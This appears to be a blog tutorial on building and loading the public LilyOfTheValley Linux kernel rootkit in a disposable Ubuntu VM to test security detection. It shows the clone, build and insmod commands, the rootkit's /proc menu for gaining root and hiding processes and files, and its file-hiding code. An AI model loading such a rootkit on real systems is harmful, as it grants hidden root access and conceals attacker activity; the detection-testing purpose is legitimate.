Let’s say you wnat to install a rootkit to test with. There could be various reasons, maybe you are testing some kind of specialized security system. Regardless of the reason, you need a rootkit to test out.
The first place I ended up at is Awesome Rootkits, a big list of rootkits.
The one that I picked from that list, somewhat randomly, was LilyOfTheValley. I have no good reason as to why I picked this particular one, other than it seemed to suggest it would work on several kernel versions, and was a small amount of code.
Obviously this is a rootkit. Don’t install it on your local machine. Get a temporary, disposable virtual machine. Also, please review the code in the rootkit files. You’ve been warned!
The kernel version in this example is 4.4.0-22 on Ubuntu 16.04.
# uname -a
Linux old-kernely 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Clone the rootkit repo.
# git clone https://github.com/En14c/LilyOfTheValley
# cd LilyOfTheValley
Install build-essential.
# apt install build-essential -y
Get headers too.
# apt install linux-headers-4.4.0-22-generic
Make.
# make
make -C /lib/modules/4.4.0-22-generic/build M=/root/LilyOfTheValley modules
make[1]: Entering directory '/usr/src/linux-headers-4.4.0-22-generic'
CC [M] /root/LilyOfTheValley/lilyofthevalley.o
Building modules, stage 2.
MODPOST 1 modules
CC /root/LilyOfTheValley/lilyofthevalley.mod.o
LD [M] /root/LilyOfTheValley/lilyofthevalley.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.4.0-22-generic'
Now there is a kernel module, lilyofthevalley.ko.
# ls -1
client.c
lilyofthevalley.c
lilyofthevalley.ko
lilyofthevalley.mod.c
lilyofthevalley.mod.o
lilyofthevalley.o
Makefile
modules.order
Module.symvers
README.md
Install that module.
# insmod lilyofthevalley.ko
Once it’s loaded /proc can be used to find commands that can be sent to the module.
# cat /proc/lilyofthevalleyr00tkit
###########################
LilyOfTheValley Commands
###########################
* [givemerootprivileges] -->> to gain root access
* [hidepidPID] -->> to hide a given pid. replace (PID) with target pid
* [unhidepidPID] -->> to unhide a given pid. replace (PID) with target pid
* [hidingfiles] -->> just prepend lilyofthevalley to the file or dir name that u want to hide
Also, note how any files in the directory that started with the string “lilyofthevalley” now no longer appear in ls.
# ls -1
client.c
Makefile
modules.order
Module.symvers
README.md
This is because the rootkit makes those files “invisble.”
See line 409 of lilyofthevalley.c.
/*
hide any file in the root filesystem,
if first chars of it's name == r00tkit_name
*/
if (strncmp(name,R00TKIT_NAME,R00TKIT_NAMELEN) == 0)
return 0;
Create a file that starts with that particular string. Note how it’s not visible in ls.
# touch lilyofthevalley.txt
# ls
client.c Makefile modules.order Module.symvers README.md
After rebooting the node the kernel module is no longer loaded and the missing files are again visible..
# ls -1
client.c
lilyofthevalley.c
lilyofthevalley.ko
lilyofthevalley.mod.c
lilyofthevalley.mod.o
lilyofthevalley.o
lilyofthevalley.txt
Makefile
modules.order
Module.symvers
README.md
With the module in place security systems can be tested to see if they can find it.